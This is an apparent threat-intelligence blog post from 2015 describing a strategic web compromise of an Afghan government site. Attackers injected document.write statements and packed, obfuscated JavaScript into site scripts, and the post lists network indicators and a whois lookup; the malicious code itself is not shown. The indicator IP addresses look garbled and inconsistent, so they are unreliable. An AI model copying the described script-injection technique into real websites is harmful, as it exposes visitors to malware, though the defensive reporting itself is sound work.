Afghan Government Compromise: Browser Beware
June 12, 2015
Second Round of Attacks
In these instances the offending code was easily identifiable, as the attackers simply prepended document.write statements to the very top of the gop-script.js file as seen below:
The next major difference is the attackers went through more of an effort to obfuscate their activity by appending their code to the end of the file and by leveraging the Dean Edwards Packer with base62 encoding. In this instance, the packer effectively makes it more difficult to discern exactly what the attackers have done just by looking at the code. The image below shows the malicious code as it currently appears within the jquery-1.4.2.min.js file:
One of the more interesting tactics that APT attackers have been employing in recent years is the usage of IP address whitelisting. Volexity believes that the attackers behind the Afghan Government compromise likely have a specific set of targets that are potential recipients of malicious code via the 18.104.22.168 address. In all observed instances thus far, only HTTP 403 (Forbidden) responses have been observed. This threat group has used similar tactics on other websites involved in strategic web compromises in the past as well. The only real way to identify the targets is to observe the code actually being seen, or see the whitelist from the server itself. At this point we can only speculate that Government and Defense entities are likely the intended targets of this campaign. If you check your logs and find HTTP 200 results, we would like to hear from you.
The most straightforward and primary network indicator at this time is looking for for communication with the IP address 22.214.171.124. ASN details via the Shadowserver IP-BGP service are shown below.
$ whois -h asn.shadowserver.org 'origin 126.96.36.199'
15830 | 188.8.131.52/19 | TELECITY | GB | linode.com | Linode LLC